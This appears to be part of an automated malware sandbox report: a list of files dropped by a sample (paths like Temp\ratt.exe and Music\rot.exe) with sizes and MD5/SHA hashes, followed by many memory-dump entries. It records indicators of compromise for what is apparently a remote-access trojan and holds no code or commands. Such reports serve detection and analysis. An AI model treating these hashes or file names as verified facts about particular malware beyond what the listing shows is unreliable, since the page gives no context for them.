ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

SHA512
2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

Download Submit
\Users\Admin\AppData\Local\Temp\7z.exe

Filesize
71KB

MD5
8ba2e41b330ae9356e62eb63514cf82e

SHA1
8dc266467a5a0d587ed0181d4344581ef4ff30b2

SHA256
ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

SHA512
2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

Download Submit
\Users\Admin\AppData\Local\Temp\ratt.exe

Filesize
228.0MB

MD5
3d3b37166d4a2624c2974ec664caaaed

SHA1
a8c052c2a2484c60700cab4451aae505cc56459d

SHA256
f303a75a042e9f3454263224bcb6733cccafeb73316aaaae637c189f0af46604

SHA512
b5c7ca28418d84311a1fdb1dc927adb4013674b41c7491e73d577063920f5462921cdd45aeaa84c2db95b71c6702697d42c01696ea4f47bb363c59b0456539bf

Download Submit
\Users\Admin\Music\rot.exe

Filesize
21.9MB

MD5
819a0b667ccc18a3ac53822125b6c0ec

SHA1
d4a1501c6addab01edd78f5c0b38397c670c9b57

SHA256
8e69aa6ad00e8d9b969a075526d7736b9cf410c1bca13da3eaa4be6da736d61f

SHA512
67a0e142bc3085f76dde621d5c3b981589a5ad5e91bbe0cfd29f0d95ca0919922df3d9baed3d4cba9ebedf81efb9706562ca9b4abcd6bff3856201f4bdd2d9f9

Download Submit
memory/696-112-0x0000000070320000-0x0000000070A0E000-memory.dmp

Filesize
6.9MB

Download
memory/696-116-0x0000000070320000-0x0000000070A0E000-memory.dmp

Filesize
6.9MB

Download
memory/696-114-0x0000000004B30000-0x0000000004B70000-memory.dmp

Filesize
256KB

Download
memory/696-111-0x0000000001380000-0x0000000001536000-memory.dmp

Filesize
1.7MB

Download
memory/780-56-0x0000000073D00000-0x00000000742AB000-memory.dmp

Filesize
5.7MB

Download
memory/780-55-0x0000000073D00000-0x00000000742AB000-memory.dmp

Filesize
5.7MB

Download
memory/780-54-0x0000000073D00000-0x00000000742AB000-memory.dmp

Filesize
5.7MB

Download
memory/1196-105-0x0000000070320000-0x0000000070A0E000-memory.dmp

Filesize
6.9MB

Download
memory/1196-107-0x0000000004B80000-0x0000000004BC0000-memory.dmp

Filesize
256KB

Download
memory/1196-117-0x0000000070320000-0x0000000070A0E000-memory.dmp

Filesize
6.9MB

Download
memory/1196-115-0x0000000004B80000-0x0000000004BC0000-memory.dmp

Filesize
256KB

Download
memory/1196-106-0x0000000001310000-0x00000000014C6000-memory.dmp

Filesize
1.7MB

Download
memory/1196-113-0x0000000070320000-0x0000000070A0E000-memory.dmp

Filesize
6.9MB

Download
memory/1196-108-0x00000000005D0000-0x0000000000616000-memory.dmp

Filesize
280KB

Download
memory/1624-125-0x00000000741E0000-0x00000000748CE000-memory.dmp

Filesize
6.9MB

Download
memory/1624-126-0x0000000000B10000-0x0000000000CC6000-memory.dmp

Filesize
1.7MB

Download
memory/1624-127-0x0000000000AD0000-0x0000000000B16000-memory.dmp

Filesize
280KB

Download
memory/1644-64-0x00000000028A0000-0x00000000028E0000-memory.dmp

Filesize
256KB

Download
memory/1644-66-0x0000000073340000-0x00000000738EB000-memory.dmp

Filesize
5.7MB

Download
memory/1644-65-0x0000000073340000-0x00000000738EB000-memory.dmp

Filesize
5.7MB

Download
memory/1644-82-0x0000000073340000-0x00000000738EB000-memory.dmp

Filesize
5.7MB

Download
memory/1644-63-0x0000000073340000-0x00000000738EB000-memory.dmp

Filesize
5.7MB

Download
memory/1748-83-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/1748-69-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/1748-84-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/1748-77-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/1992-75-0x0000000010000000-0x00000000100E2000-memory.dmp

Filesize
904KB

Download
memory/1992-74-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/1992-80-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/2388-46-0x0000000073340000-0x00000000738EB000-memory.dmp

Filesize
5.7MB

Download
memory/2388-45-0x0000000073340000-0x00000000738EB000-memory.dmp

Filesize
5.7MB

Download
memory/2388-47-0x0000000073340000-0x00000000738EB000-memory.dmp

Filesize
5.7MB

Download
memory/2492-39-0x0000000073D00000-0x00000000742AB000-memory.dmp

Filesize
5.7MB

Download
memory/2492-38-0x00000000023D0000-0x0000000002410000-memory.dmp

Filesize
256KB

Download
memory/2492-37-0x0000000073D00000-0x00000000742AB000-memory.dmp

Filesize
5.7MB

Download
memory/2492-36-0x0000000073D00000-0x00000000742AB000-memory.dmp

Filesize
5.7MB

Download
memory/2792-28-0x00000000025A0000-0x00000000025E0000-memory.dmp

Filesize
256KB

Download
memory/2792-29-0x00000000025A0000-0x00000000025E0000-memory.dmp

Filesize
256KB

Download
memory/2792-27-0x0000000073FB0000-0x000000007455B000-memory.dmp

Filesize
5.7MB

Download
memory/2792-26-0x0000000073FB0000-0x000000007455B000-memory.dmp

Filesize
5.7MB

Download
memory/2792-30-0x0000000073FB0000-0x000000007455B000-memory.dmp

Filesize
5.7MB

Download
memory/2856-96-0x0000000002770000-0x00000000027B0000-memory.dmp

Filesize
256KB

Download
memory/2856-104-0x0000000073D00000-0x00000000742AB000-memory.dmp

Filesize
5.7MB

Download
memory/2856-101-0x0000000073D00000-0x00000000742AB000-memory.dmp

Filesize
5.7MB

Download
memory/2856-99-0x0000000002770000-0x00000000027B0000-memory.dmp

Filesize
256KB

Download
memory/2856-98-0x0000000073D00000-0x00000000742AB000-memory.dmp

Filesize
5.7MB

Download
memory/2856-93-0x0000000073D00000-0x00000000742AB000-memory.dmp

Filesize
5.7MB

Download
memory/2856-94-0x0000000002770000-0x00000000027B0000-memory.dmp

Filesize
256KB

Download
memory/2856-97-0x0000000073D00000-0x00000000742AB000-memory.dmp

Filesize
5.7MB

Download